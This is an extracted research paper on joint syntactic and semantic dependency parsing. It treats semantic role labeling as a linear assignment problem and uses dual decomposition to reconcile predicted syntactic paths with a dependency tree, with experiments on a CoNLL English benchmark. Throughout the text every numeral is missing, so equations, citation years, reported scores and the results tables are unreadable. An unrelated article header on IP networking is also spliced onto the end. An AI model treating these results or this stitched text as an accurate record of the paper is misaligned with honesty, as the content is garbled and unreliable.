will in- dicate the presence of a syntactic dependency from head token h to dependant token m labeled with syn- tactic function l. then, a syntactic tree will be de- noted as a vector y of variables indexed by syntactic dependencies. similarly, a variable zp,a,r will indi- cate the presence of a semantic dependency between predicate token p and argument token a labeled with semantic role r. we will represent a semantic role structure as a vector z indexed by semantic depen- dencies. whenever we enumerate syntactic depen- dencies 〈h,m,l〉 we will assume that they are in the valid range for x, i.e. ≤ h ≤ n, ≤ m ≤ n, h = m and l ∈ rsyn, where h = stands for a special root token. similarly, for semantic depen- dencies 〈p,a,r〉 we will assume that p points to a predicate of x, ≤ a ≤ n and r ∈rsem. a joint model for syntactic and semantic depen- dency parsing could be defined as: argmax y,z s syn(x,y) + s srl(x,z,y) . ( ) in the equation, s syn(x,y) gives a score for the syntactic tree y. in the literature, it is standard to use arc-factored models defined as s syn(x,y) = ∑ yh,m,l= s syn(x,h,m,l) , ( ) where we overload s syn to be a function that computes scores for individual syntactic depen- dencies. in linear discriminative models one has s syn(x,h,m,l) = wsyn · fsyn(x,h,m,l), where fsyn is a feature vector for a syntactic dependency and wsyn is a vector of parameters (mcdonald et al., ). in section we describe how we trained score functions with discriminative methods. the other term in eq. , s srl(x,z,y), gives a score for a semantic dependency structure z using features of the syntactic structure y. previous work has empirically proved the importance of exploit- ing syntactic features in the semantic component (gildea and jurafsky, ; xue and palmer, ; punyakanok et al., ). however, without further assumptions, this property makes the optimization problem computationally hard. one simple approx- imation is to use a pipeline model: first compute the optimal syntactic tree y, and then optimize for the best semantic structure z given y. in the rest of the paper we describe a method that searches over syn- tactic and semantic dependency structures jointly. we first note that for a fixed semantic dependency, the semantic component will typically restrict the syntactic features representing the dependency to a specific subtree of y. for example, previous work has restricted such features to the syntactic path that links a predicate with an argument (moschitti, ; johansson, ), and in this paper we employ this restriction. figure gives an example of a sub- tree, where we highlight the syntactic path that con- nects the semantic dependency between “play” and “mary” with role arg . formally, for a predicate p, argument a and role r we define a local syntactic subtree πp,a,r repre- sented as a vector: πp,a,rh,m,l indicates if a dependency 〈h,m,l〉 is part of the syntactic path that links pred- icate p with token a and role r. given full syntactic and semantic structures y and z it is trivial to con- struct a vector π that concatenates vectors πp,a,r for all 〈p,a,r〉 in z. the semantic model becomes s srl(x,z,π) = ∑ zp,a,r= s srl(x,p,a,r,πp,a,r) , ( ) where s srl computes a score for a semantic de- pendency 〈p,a,r〉 together with its syntactic path πp,a,r. as in the syntactic component, this function is typically defined as a linear function over a set of features of the semantic dependency and its path. the inference problem of our joint model is: argmax y,z,π s syn(x,y) + s srl(x,z,π) ( ) subject to ctree : y is a valid dependency tree crole : ∀p,r : ∑ a zp,a,r ≤ carg : ∀p,a : ∑ r zp,a,r ≤ cpath : ∀p,a,r : if zp,a,r = then πp,a,r is a path from p to a, otherwise πp,a,r = csubtree : ∀p,a,r : πp,a,r is a subtree of y constraint ctree dictates that y is a valid depen- dency tree; see (martins et al., ) for a detailed specification. the next two sets of constraints con- cern the semantic structure only. crole imposes that each semantic role is realized at most once. con- versely, carg dictates that an argument can realize at most one semantic role in a predicate. the final two sets of constraints model the syntactic-semantic interdependencies. cpath imposes that each πp,a,r represents a syntactic path between p and a when- ever there exists a semantic relation. finally, csub- tree imposes that the paths in π are consistent with the full syntactic structure, i.e. they are subtrees. in this paper we say that structures πp,a,r are paths from predicates to arguments, but they could be more general sub- trees. the condition to build a joint system is that these subtrees must be parseable in the way we describe in section . . in general a semantic role can be realized with more than one argument, though it is rare. it is not hard to modify our framework to allow for a maximum number of occurrences of a semantic role. in section we define a process that optimizes the semantic structure ignoring constraint csubtree. then in section we describe a dual decomposition method that uses the first process repeatedly to solve the joint problem. srl as assignment in this section we frame the problem of finding se- mantic dependencies as a linear assignment task. the problem we optimize is: argmax z,π s srl(x,z,π) ( ) subject to crole, carg, cpath in this case we dropped the full syntactic structure y from the optimization in eq. , as well as the corresponding constraints ctree and csubtree. as a consequence, we note that the syntactic paths π are not tied to any consistency constraint other than each of the paths being a well-formed sequence of dependencies linking the predicate to the argument. in other words, the optimal solution in this case does not guarantee that the set of paths from a predicate to all of its arguments satisfies tree constraints. we first describe how these paths can be optimized locally. then we show how to find a solution z satisfying crole and carg using an assignment algorithm. . local optimization of syntactic paths let ẑ and π̂ be the optimal values of eq. . for any 〈p,a,r〉, let π̃p,a,r = argmax πp,a,r s srl(x,p,a,r,πp,a,r) . ( ) for any 〈p,a,r〉 such that ẑp,a,r = it has to be that π̂p,a,r = π̃p,a,r. if this was not true, replacing π̂p,a,r with π̃p,a,r would improve the objective of eq. without violating the constraints, thus contradicting the hypothesis about optimality of π̂. therefore, for each 〈p,a,r〉 we can optimize its best syntactic path locally as defined in eq. . in this paper, we will assume access to a list of likely syntactic paths for each predicate p and argu- ment candidate a, such that the optimization in eq. can be solved explicitly by looping over each path in the list. the main advantage of this method is that, since paths are precomputed, our model can make unrestricted use of syntactic path features. ( ) mary ( ) plays ( ) guitar ( ) null ( ) null ( ) null ( ) arg ( ) arg ( ) arg ( ) null ( ) null ( ) null w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , w , figure : illustration of the assignment graph for the sen- tence “mary plays guitar”, where the predicate “plays” can have up to three roles: arg (agent), arg (theme) and arg (benefactor). nodes labeled null represent a null role or token. highlighted edges are the correct assignment. it is simple to employ a probabilistic syntactic de- pendency model to create the list of likely paths for each predicate-argument pair. in the experiments we explore this approach and show that with an average of paths per predicate we can recover . % of the correct paths. we leave for future work the development of ef- ficient methods to recover the most likely syntactic structure linking an argument with its predicate. . the assignment algorithm coming back to solving eq. , it is easy to see that an optimal solution satisfying constraints crole and carg can be found with a linear assignment algorithm. the process we describe determines the predicate-argument relations separately for each predicate. assume a bipartite graph of size n with role nodes r . . .rn on one side and argument nodes a . . .an on the other side. assume also a matrix of non-negative scores wi,j corresponding to assigning argument aj to role ri. a linear assignment algo- rithm finds a bijection f : i → j from roles to argu- ments that maximizes ∑n i= wi,f(i). the hungarian algorithm finds the exact solution to this problem in o(n ) time (kuhn, ; burkard et al., ). all that is left is to construct a bipartite graph rep- resenting predicate roles and sentence tokens, such that some roles and tokens can be left unassigned, which is a common setting for assignment tasks. al- gorithm describes a procedure for constructing a weighted bipartite graph for srl, and figure il- lustrates an example of a bipartite graph. we then algorithm construction of an assignment graph for semantic role labeling let p be a predicate with k possible roles. let n be the number of argument candidates in the sentence. this al- gorithm creates a bipartite graph with n = n+k vertices on each side. . create role vertices ri for i = . . .n, where • for ≤ i ≤ k, ri is the i-th role, • for ≤ i ≤ n, rk+i is a special null role. . create argument vertices aj for j = . . .n, where • for ≤ j ≤ n, aj is the j-th argument candidate, • for ≤ j ≤ k, an+j is a special null argument. . define a matrix of model scores s ∈ r(k+ )×n: (a) optimization of syntactic paths: for ≤ i ≤ k, ≤ j ≤ n si,j = max π p,aj ,ri s srl(x,p,aj,ri,π p,aj,ri ) (b) scores of null assignments : for ≤ j ≤ n sk+ ,j = . let s = mini,j si,j , the minimum of any score in s. define a matrix of non-negative scores w ∈ rn×n as follows: (a) for ≤ i ≤ k, ≤ j ≤ n wi,j = si,j −s (b) for k < i ≤ n, ≤ j ≤ n wi,j = sk+ ,j −s (c) for < i ≤ n, n < j ≤ n wi,j = run the hungarian algorithm on the weighted graph and obtain a bijection f : ri → aj, from which it is trivial to recover the optimal solution of eq. . finally, we note that it is simple to allow for multi- ple instances of a semantic role by adding more role nodes in step ; it would be straightforward to add penalties in step for multiple instances of roles. a dual decomposition algorithm we now present a dual decomposition method to op- timize eq. , that uses the assignment algorithm pre- sented above as a subroutine. our method is sim- ilar to that of koo et al. ( ), in the sense that in our model we fix the score of null assignments to . it is straightforward to compute a discriminative score instead. our joint optimization can be decomposed into two sub-problems that need to agree on the syntactic dependencies they predict. for a detailed descrip- tion of dual decomposition methods applied to nlp see (sontag et al., ; rush et al., ). we note that in eq. the constraint csubtree ties the syntactic and semantic structures, imposing that any path πp,a,r that links a predicate p with an argu- ment a must be a subtree of the full syntactic struc- ture y. formally the set of constraints is: yh,m,l ≥ πp,a,rh,m,l ∀ p,a,r,h,m,l . these constraints can be compactly written as c ·yh,m,l ≥ ∑ p,a,r π p,a,r h,m,l ∀ h,m,l , where c is a constant equal to the number of dis- tinct semantic dependencies 〈p,a,r〉. in addition, we can introduce a vector non-negative slack vari- ables ξ with a component for each syntactic depen- dency ξh,m,l, turning the constraints into: c ·yh,m,l − ∑ p,a,r π p,a,r h,m,l − ξh,m,l = ∀ h,m,l we can now rewrite eq. as: argmax y,z,π,ξ≥ s syn(x,y) + s srl(x,z,π) ( ) subject to ctree, crole, carg, cpath ∀h,m,l : c ·yh,m,l − ∑ p,a,r π p,a,r h,m,l − ξh,m,l = as in koo et al. ( ), we will relax subtree cons- traints by introducing a vector of lagrange multipli- ers λ indexed by syntactic dependencies, i.e. each coordinate λh,m,l is a lagrange multiplier for the constraint associated with 〈h,m,l〉. the lagrangian of the problem is: l(y,z,π,ξ,λ)= s syn(x,y) + s srl(x,z,π) + λ · ( c ·y − ∑ p,a,r πp,a,r −ξ ) ( ) we can now formulate eq. as: max y,z,π,ξ≥ s.t. ctree,crole,carg,cpath c·y− ∑ p,a,r π p,a,r−ξ= l(y,z,π,ξ,λ) ( ) this optimization problem has the property that its optimum value is the same as the optimum of eq. for any value of λ. this is because whenever the constraints are satisfied, the terms in the lagrangian involving λ are zero. if we remove the subtree con- straints from eq. we obtain the dual objective: d(λ) = max y,z,π,ξ≥ s.t. ctree,crole,carg,cpath l(y,z,π,ξ,λ) ( ) = max y s.t. ctree ( s syn(x,y) + c ·y ·λ ) + max z,π s.t. crole,carg,cpath ( s srl(x,z,π) −λ · ∑ p,a,r πp,a,r ) + max ξ≥ (−λ ·ξ) ( ) the dual objective is an upper bound to the opti- mal value of primal objective of eq. . thus, we are interested in finding the minimum of the dual in order to tighten the upper-bound. we will solve min λ d(λ) ( ) using a subgradient method. algorithm presents pseudo-code. the algorithm takes advantage of the decomposed form of the dual in eq. , where we have rewritten the lagrangian such that syntac- tic and semantic structures appear in separate terms. this will allow to compute subgradients efficiently. in particular, the subgradient of d at a point λ is: ∆(λ) = c · ŷ − ∑ p,a,r π̂p,a,r − ξ̂ ( ) where ŷ = argmax y s.t. ctree ( s syn(x,y) + c ·y ·λ ) ( ) ẑ,π̂ = argmax z,π s.t. crole,carg,cpath s srl(x,z,π) −λ· ∑ p,a,r πp,a,r ( ) ξ̂ = argmax ξ≥ −λ ·ξ ( ) whenever π̂ is consistent with ŷ the subgradient will be zero and the method will converge. when paths π̂ contain a dependency 〈h,m,l〉 that is in- consistent with ŷ, the associated dual λh,m,l will in- crease, hence lowering the score of all paths that use 〈h,m,l〉 at the next iteration; at same time, the to- tal score for that dependency will increase, favoring syntactic dependency structures alternative to ŷ. as algorithm a dual-decomposition algorithm for syntactic-semantic dependency parsing input: x, a sentence; t , number of iterations; output: syntactic and semantic structures ŷ and ẑ notation: we use csem= crole ∧ carg ∧ cpath : λ = # initialize dual variables : c =number of distinct 〈h,m,l〉 in x : for t = . . .t do : ŷ = argmaxy s.t. ctree ( s syn(x,y) + c ·λt ·y ) : ẑ,π̂ = argmax z,π s.t. csem ( s srl(x,z,π) −λt · ∑ p,a,r π p,a,r ) : λt+ = λt # dual variables for the next iteration : set αt, the step size of the current iteration : for each 〈h,m,l〉 do : q = ∑ p,a,r π̂ p,a,r h,m,l # num. paths using 〈h,m,l〉 : if q > and ŷh,m,l = then : λt+ h,m,l = λ t+ h,m,l + αtq : break if λt+ = λt # convergence : return ŷ, ẑ in previous work, in the algorithm a parameter αt controls the size of subgradient steps at iteration t. the key point of the method is that solutions to eq. and can be computed efficiently using sep- arate processes. in particular, eq. corresponds to a standard dependency parsing problem, where for each dependency 〈h,m,l〉 we have an additional score term c·λh,m,l —in our experiments we use the projected dependency parsing algorithm by (eisner, ). to calculate eq. we use the assignment method described in section , where it is straight- forward to introduce additional score terms −λh,m,l to every factor πp,a,rh,m,l. it can be shown that whenever the subgradient method converges, the solutions ŷ and ẑ are the optimal solutions to our original prob- lem in eq. (see (koo et al., ) for a justifi- cation). in practice we run the subgradient method for a maximum number of iterations, and return the solutions of the last iteration if it does not converge. related work recently, there have been a number of approaches to joint parsing of syntactic and semantic dependen- cies, partly because of the availability of treebanks in this format popularized by the conll shared tasks (surdeanu et al., ; hajič et al., ). like in our method, johansson ( ) defined a model that exploits features of a semantic depen- dency together with the syntactic path connecting the predicate and the argument. that method uses an approximate parsing algorithm that employs k-best inference and beam search. similarly, lluı́s et al. ( ) defined a joint model that forces the predi- cate structure to be represented in the syntactic de- pendency tree, by enriching arcs with semantic in- formation. the semantic component uses features of pre-computed syntactic structures that may diverge from the joint structure. in contrast, our joint pars- ing method is exact whenever the dual decomposi- tion algorithm converges. titov et al. ( ) augmented a transition-based dependency parser with operations that produce synchronous derivations of syntactic and semantic structures. instead of explicitly representing seman- tic dependencies together with a syntactic path, they induce latent representations of the interactions be- tween syntactic and semantic layers. in all works mentioned the model has no con- trol of assignment constraints that disallow label- ing multiple arguments with the same semantic role. punyakanok et al. ( ) first introduced a system that explicitly controls these constraints, as well as other constraints that look at pairwise assignments which we can not model. they solve srl using general-purpose integer linear programming (ilp) methods. in similar spirit, riedel and mccallum ( ) presented a model for extracting structured events that controls interactions between predicate- argument assignments. they take into account pair- wise assignments and solve the optimization prob- lem with dual decomposition. more recently, das et al. ( ) proposed a dual decomposition method that deals with several assignment constraints for predicate-argument relations. their method is an alternative to general ilp methods. to our knowl- edge, our work is the first that frames srl as a linear assignment task, for which simple and exact algo- rithms exist. we should note that these works model predicate-argument relations with assignment con- straints, but none of them predicts the underlying syntactic structure. our dual decomposition method follows from that of koo et al. ( ). in both cases two separate pro- cesses predict syntactic dependency structures, and the dual decomposition algorithm seeks agreement at the level of individual dependencies. one dif- ference is that our semantic process predicts partial syntax (restricted to syntactic paths connecting pred- icates and arguments), while in their case each of the two processes predicts the full set of dependencies. experiments we present experiments using our syntactic- semantic parser on the conll- shared task english benchmark (hajič et al., ). it consists of the usual wsj training/development/test sections mapped to dependency trees, augmented with se- mantic predicate-argument relations from propbank (palmer et al., ) and nombank (meyers et al., ) also represented as dependencies. it also con- tains a propbanked portion of the brown corpus as an out-of-domain test set. our goal was to evaluate the contributions of pars- ing algorithms in the following configurations: base pipeline runs a syntactic parser and then runs an srl parser constrained to paths of the best syntactic tree. in the srl it only enforces con- straint carg, by simply classifying the candi- date argument in each path into one of the pos- sible semantic roles or as null. pipeline with assignment runs the assignment al- gorithm for srl, enforcing constraints crole and carg, but constrained to paths of the best syntactic tree. forest runs the assignment algorithm for srl on a large set of precomputed syntactic paths, de- scribed below. this configuration corresponds to running dual decomposition for a single it- eration, and is not guaranteed to predict consis- tent syntactic and semantic structures. dual decomposition (dd) runs dual decomposi- tion using the assignment algorithm on the set of precomputed paths. syntactic and semantic structures are consistent when it reaches con- vergence. all four systems used the same type of discrimina- tive scorers and features. next we provide details about these systems. then we present the results. . implementation syntactic model we used two discriminative arc- factored models for labeled dependency parsing: a first-order model, and a second-order model with grandchildren interactions, both reimplementations of the parsers by mcdonald et al. ( ) and car- reras ( ) respectively. in both cases we used projective dependency parsing algorithms based on (eisner, ). to learn the models, we used a log-linear loss function following koo et al. ( ), which trains probabilistic discriminative parsers. at test time, we used the probabilistic parsers to compute marginal probabilities p(h,m,l | x), us- ing inside-outside algorithms for first/second-order models. hence, for either of the parsing models, we always obtain a table of first-order marginal scores, with one score per labeled dependency. then we run first-order inference with these marginals to ob- tain the best tree. we found that the higher-order parser performed equally well on development us- ing this method as using second-order inference to predict trees: since we run the parser multiple times within dual decomposition, our strategy results in faster parsing times. precomputed paths both forest and dual de- composition run assignment on a set of precomputed paths, and here we explain how we build it. we first observed that . % of the correct arguments in de- velopment data are either direct descendants of the predicate, direct descendants of an ancestor of the predicate, or an ancestor of the predicate. all meth- ods we test are restricted to this syntactic scope. to generate a list of paths, we did as follows: • calculate marginals of unlabeled dependencies using the first-order parser: p(h,m | x) =∑ l p(h,m,l | x). note that for each m, the probabilities p(h,m|x) for all h form a distri- bution (i.e. they sum to one). then, for each m, keep the most-likely dependencies that cover at least % of the mass, and prune the rest. • starting from a predicate p, generate a path by taking any number of dependencies that as- cend, and optionally adding one dependency that descends. we constrained paths to be pro- jective, and to have a maximum number of our method allows to use non-projective dependency pars- ing methods seamlessly. this is specific to conll- data for english. in gen- eral, for other languages the coverage of these rules may be lower. we leave this question to future work. ascendant dependencies. • label each unlabeled edge 〈h,m〉 in the paths with l = argmaxl p(h,m,l | x). on development data, this procedure generated an average of . paths per predicate that cover . % of the correct paths. in contrast, enumerating paths of the single-best tree covers . % of correct paths for the first-order parser, and . % for the second- order parser. srl model we used a discriminative model with similar features to those in the system of johansson ( ). in addition, we included the following: • unigram/bigram/trigram path features. for all n-grams in the syntactic path, patterns of words and pos tags (e.g., mary+loves+to, mary+vb+to). • voice features. the predicate voice together with the word/pos of the argument (e.g., pas- sive+mary). • path continuity. count of non-consecutive to- kens in a predicate-argument path. to train srl models we used the averaged per- ceptron (collins, ). for the base pipeline we trained standard srl classifiers. for the rest of models we used the structured perceptron running the assignment algorithm as inference routine. in this case, we generated a large set of syntactic paths for training using the procedure described above, and we set the loss function to penalize mistakes in predicting the semantic role of arguments and their syntactic path. dual decomposition we added a parameter β weighting the syntactic and semantic components of the model as follows: ( −β) s syn(x,y) + β s srl(x,z,π) . as syntactic scores we used normalized marginal probabilities of dependencies, either from the first or the higher-order parser. the scores of all factors of the srl model were normalized at every sen- tence to be between - and . the rest of details one can evaluate the maximum recall on correct arguments that can be obtained, irrespective of whether the syntactic path is correct: for the set of paths it is . %, while for single-best trees it is . % and . % for first and second-order models. o las uas semp semr semf sempp pipeline . . . . . . w. assig. . . . . . . forest - - - . . . . pipeline . . . . . . w. assig. . . . . . . table : results on development for the baseline and as- signment pipelines, running first and second-order syn- tactic parsers, and the forest method. o indicates the or- der of syntactic inference. of the method were implemented following koo et al. ( ), including the strategy for decreasing the step size αt. we ran the algorithm for up to it- erations, with initial step size of . . . results to evaluate syntactic dependencies we use unla- beled attachment score (uas), i.e., the percentage of words with the correct head, and labeled attach- ment scores (las), i.e., the percentage of words with the correct head and syntactic label. semantic predicate-argument relations are evaluated with pre- cision (semp), recall (semr) and f measure (semf ) at the level of labeled semantic dependencies. in ad- dition, we measure the percentage of perfectly pre- dicted predicate structures (sempp). table shows the results on the development set for our three first methods. we can see that the pipeline methods running assignment improve over the baseline pipelines in semantic f by about points, due to the application of the crole constraint. the forest method also shows an improvement in recall of semantic roles with respect to the pipeline methods. presumably, the set of paths available in the forest model allows to recognize a higher num- ber of arguments at an expense of a lower preci- sion. regarding the percentage of perfect predicate- argument structures there is a remarkable improve- ment in the systems that apply the full set of con- our evaluation metrics differ slightly from the official met- ric at conll- . that metric considers predicate senses as special semantic dependencies and, thus, it includes them in the calculation of the evaluation metrics. in this paper, we are not addressing predicate sense disambiguation and, conse- quently, we ignore predicate senses when presenting evaluation results. when we report the performance of conll systems, their scores will be noticeably lower than the scores reported at the shared task. this is because predicate disambiguation is a reasonably simple task with a very high baseline around %. o β las uas semp semr semf sempp %conv . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . table : results of the dual decomposition method on development data, for different values of the β parame- ter. o is the order of the syntactic parser. %conv is the percentage of examples that converged. straints using the assignment algorithm. we believe that the crole constraint that ensures no repeated roles for a given predicate is a key factor to predict the full set of arguments of a predicate. the forest configuration is the starting point to run the dual decomposition algorithm. we ran ex- periments for various values of the β parameter. ta- ble shows the results. we see that as we increase β, the srl component has more relative weight, and the syntactic structure changes. the dd methods are always able to improve over the forest methods, and find convergence in more than . % of sentences. compared to the pipeline running assignment, dd improves semantic f for first-order inference, but not for higher-order inference, suggesting that nd order predictions of paths are quite accurate. we also observe slight benefits in syntactic accuracy. table presents results of our system on the test sets, where we run pipeline with assignment and dual decomposition with our best configura- tion (β = . / . for st/ nd order syntax). for comparison, the table also reports the results of the best conll– joint system, merlo (ges- mundo et al., ), which proved to be very com- petitive ranking third in the closed challenge. we also include lluı́s (lluı́s et al., ), which is an- other joint syntactic-semantic system from conll– . in the wsj test dd obtains the best syntactic accuracies, while the pipeline obtains the best se- another system to compare to is the joint system by jo- hansson ( ). unfortunately, a direct comparison is not possi- ble because it is evaluated on the conll- datasets, which wsj las uas semp semr semf sempp lluı́s . . . . . . merlo . . . . . . pipe-assig st . . . . . . dd st . . . . . . pipe-assig nd . . . . . . dd nd . . . . . . brown las uas semp semr semf sempp lluı́s . . . . . . merlo . . . . . . pipe-assig st . . . . . . dd st . . . . . . pipe-assig nd . . . . . . dd nd . . . . . . table : comparative results on the conll– en- glish test sets, namely the wsj test (top table) and the out of domain test from the brown corpus (bottom table). mantic f . the bottom part of table presents re- sults on the out-of-domain brown test corpus. in this case, dd obtains slightly better results than the rest, both in terms of syntactic accuracy and semantic f . table shows statistical significance tests for the syntactic las and semantic f scores of table . we have applied the sign test (wackerly et al., ) and approximate randomization tests (yeh, ) to all pairs of systems outputs. the differences be- tween systems in the wsj test can be considered significant in almost all cases with p = . . in the brown test set, results are more unstable and dif- ferences are not significant in general, probably be- cause of the relatively small size of that test. regarding running times, our implementation of the baseline pipeline with nd order inference parses the development set ( , sentences) in less than minutes. running assignment in the pipeline in- creases parsing time by ∼ % due to the overhead from the assignment algorithm. the forest method, with an average of . paths per predicate, is ∼ % slower than the pipeline due to the exploration of the space of precomputed paths. finally, dual decom- position with nd order inference converges in . iterations per sentence on average. the first itera- tion of dd has to perform roughly the same work as forest, while subsequent iterations only need to re-parse the sentence with respect to the dual up- are slightly different. however, note that merlo is an applica- tion of the system by titov et al. ( ). in that paper authors report results on the conll- datasets, and they are com- parable to johansson’s. wsj brown me pa dd pa dd me pa dd pa dd ll ◦•�� ◦•�� •�� ◦•�� ◦•�� �� �� �� ◦•�� ◦•�� me ◦• ◦•�� ◦•�� ◦•�� • • pa ◦•�� ◦•�� ◦•�� • ◦•� ◦•�� dd ◦•�� ◦•�� ◦•� ◦•�� pa •�� table : statistical tests of significance for las and semf differences between pairs of systems from table . ◦/• = las difference is significant by the sign/ approxi- mate randomization tests at . level. �/� = same mean- ing for semf . the legend for systems is: ll: lluı́s , me: merlo , pa / : pipeline with assignment, st/ nd order, dd / : dual decomposition, st/ nd order. dates, which are extremely sparse. our current im- plementation did not take advantage of the sparsity of updates, and overall, dd was on average times slower than the pipeline running assignment and times slower than the baseline pipeline. conclusion we have introduced efficient methods to parse syntactic dependency structures augmented with predicate-argument relations, with two key ideas. one is to predict the local syntactic structure that links a predicate with its arguments, and seek agree- ment with the full syntactic structure using dual decomposition techniques. the second is to con- trol linear assignment constraints in the predicate- argument structure. in experiments we observe large improvements resulting from the assignment constraints. as for the dual decomposition technique for joint parsing, it does improve over the pipelines when we use a first order parser. this means that in this configu- ration the explicit semantic features help to find a solution that is better in both layers. to some ex- tent, this empirically validates the research objec- tive of joint models. however, when we move to second-order parsers the differences with respect to the pipeline are insignificant. it is to be expected that as syntactic parsers improve, the need of joint methods is less critical. it remains an open question to validate if large improvements can be achieved by integrating syntactic-semantic features. to study this question, it is necessary to have efficient pars- ing algorithms for joint dependency structures. this paper contributes with a method that has optimality guarantees whenever it converges. our method can incorporate richer families of fea- tures. it is straightforward to incorporate better se- mantic representations of predicates and arguments than just plain words, e.g. by exploiting wordnet or distributional representations as in (zapirain et al., ). potentially, this could result in larger im- provements in the performance of syntactic and se- mantic parsing. it is also necessary to experiment with differ- ent languages, where the performance of syntactic parsers is lower than in english, and hence there is potential for improvement. our treatment of local syntactic structure that links predicates with argu- ments, based on explicit enumeration of likely paths, was simplistic. future work should explore meth- ods that model the syntactic structure linking predi- cates with arguments: whenever this structure can be parsed efficiently, our dual decomposition algorithm can be employed to define an efficient joint system. acknowledgments we thank the editor and the anonymous reviewers for their valuable feedback. this work was financed by the european commission for the xlike project (fp - ); and by the spanish government for project openmt- (tin - -c - ), project skater (tin - -c - ), and a ramón y cajal contract for xavier carreras (ryc- - ). references rainer burkard, mario dell’amico, and silvano martello. . assignment problems. society for industrial and applied mathematics. xavier carreras and lluı́s màrquez. . introduc- tion to the conll- shared task: semantic role labeling. in proceedings of the ninth conference on computational natural language learning (conll- ), pages – , ann arbor, michigan, june. xavier carreras. . experiments with a higher-order projective dependency parser. in proceedings of the conll shared task session of emnlp-conll , pages – , prague, czech republic, june. michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the conference on empirical methods in natural language processing, pages – , july. dipanjan das, andré f. t. martins, and noah a. smith. . an exact dual decomposition algorithm for shallow semantic parsing with constraints. in pro- ceedings of the first joint conference on lexical and computational semantics - volume : proceedings of the main conference and the shared task, and volume : proceedings of the sixth international workshop on semantic evaluation, semeval ’ , pages – , stroudsburg, pa, usa. jason eisner. . bilexical grammars and their cubic- time parsing algorithms. in harry bunt and anton nijholt, editors, advances in probabilistic and other parsing technologies, pages – . kluwer academic publishers, october. andrea gesmundo, james henderson, paola merlo, and ivan titov. . a latent variable model of syn- chronous syntactic-semantic parsing for multiple lan- guages. in proceedings of the thirteenth confer- ence on computational natural language learning (conll ): shared task, pages – , boulder, colorado, june. daniel gildea and daniel jurafsky. . automatic la- beling of semantic roles. computational linguistics, ( ): – , september. daniel gildea and martha palmer. . the necessity of parsing for predicate argument recognition. in pro- ceedings of th annual meeting of the association for computational linguistics, pages – , philadel- phia, pennsylvania, usa, july. jan hajič, massimiliano ciaramita, richard johans- son, daisuke kawahara, maria antònia martı́, lluı́s màrquez, adam meyers, joakim nivre, sebastian padó, jan štěpánek, pavel straňák, mihai surdeanu, nianwen xue, and yi zhang. . the conll- shared task: syntactic and semantic dependen- cies in multiple languages. in proceedings of the th conference on computational natural language learning (conll- ): shared task, pages – , boulder, colorado, usa, june. richard johansson. . statistical bistratal depen- dency parsing. in proceedings of the conference on empirical methods in natural language process- ing, pages – , singapore, august. terry koo, amir globerson, xavier carreras, and michael collins. . structured prediction mod- els via the matrix-tree theorem. in proceedings of the joint conference on empirical methods in nat- ural language processing and computational natu- ral language learning (emnlp-conll), pages – , prague, czech republic, june. terry koo, alexander m. rush, michael collins, tommi jaakkola, and david sontag. . dual decompo- sition for parsing with non-projective head automata. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , cambridge, ma, october. harold w. kuhn. . the hungarian method for the assignment problem. naval research logistics quar- terly, ( - ): – . xavier lluı́s, stefan bott, and lluı́s màrquez. . a second-order joint eisner model for syntactic and semantic dependency parsing. in proceedings of the thirteenth conference on computational natu- ral language learning (conll ): shared task, pages – , boulder, colorado, june. lluı́s màrquez, xavier carreras, kenneth c. litkowski, and suzanne stevenson. . semantic role label- ing: an introduction to the special issue. computa- tional linguistics, ( ): – , june. andré martins, noah smith, and eric xing. . con- cise integer linear programming formulations for de- pendency parsing. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , sun- tec, singapore, august. ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in proceedings of the rd annual meet- ing of the association for computational linguistics (acl’ ), pages – , ann arbor, michigan, june. adam meyers, ruth reeves, catherine macleod, rachel szekely, veronika zielinska, brian young, and ralph grishman. . the nombank project: an interim report. in a. meyers, editor, hlt-naacl work- shop: frontiers in corpus annotation, pages – , boston, massachusetts, usa, may. alessandro moschitti. . a study on convolution kernels for shallow statistic parsing. in proceedings of the nd meeting of the association for computa- tional linguistics (acl’ ), main volume, pages – , barcelona, spain, july. joakim nivre and jens nilsson. . pseudo-projective dependency parsing. in proceedings of the rd annual meeting of the association for computa- tional linguistics (acl’ ), pages – , ann ar- bor, michigan, june. martha palmer, daniel gildea, and paul kingsbury. . the proposition bank: an annotated corpus of semantic roles. computational linguistics, ( ): – , march. vasin punyakanok, dan roth, and wen tau yih. . the importance of syntactic parsing and inference in semantic role labeling. computational linguistics, ( ): – , june. sebastian riedel and andrew mccallum. . fast and robust joint models for biomedical event extraction. in proceedings of the conference on empirical methods in natural language processing, pages – , edinburgh, scotland, uk., july. alexander m rush, david sontag, michael collins, and tommi jaakkola. . on dual decomposition and linear programming relaxations for natural language processing. in proceedings of the conference on empirical methods in natural language processing, pages – , cambridge, ma, october. david sontag, amir globerson, and tommi jaakkola. . introduction to dual decomposition for infer- ence. in s. sra, s. nowozin, and s. j. wright, editors, optimization for machine learning. mit press. mihai surdeanu, richard johansson, adam meyers, lluı́s màrquez, and joakim nivre. . the conll shared task on joint parsing of syntactic and se- mantic dependencies. in conll : proceedings of the twelfth conference on computational natu- ral language learning, pages – , manchester, england, august. ivan titov, james henderson, paola merlo, and gabriele musillo. . online graph planarisation for syn- chronous parsing of semantic and syntactic dependen- cies. in proceedings of the st international jont conference on artifical intelligence, ijcai’ , pages – . kristina toutanova, aria haghighi, and christopher d. manning. . a global joint model for semantic role labeling. computational linguistics, ( ): – , june. dennis d. wackerly, william mendenhall, and richard l. scheaffer, . mathematical statis- tics with applications, chapter : nonparametric statistics. duxbury press. nianwen xue and martha palmer. . calibrating features for semantic role labeling. in dekang lin and dekai wu, editors, proceedings of emnlp , pages – , barcelona, spain, july. alexander s. yeh. . more accurate tests for the sta- tistical significance of result differences. in proceed- ings of the th conference on computational linguis- tics, pages – . beñat zapirain, eneko agirre, lluı́s màrquez, and mihai surdeanu. . selectional preferences for semantic role classification. computational linguistics, ( ). doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , comparative research on key technologies from ipv , ipv to ipv sun huai school of computer science and engineering xi'an technological university xi'an, , 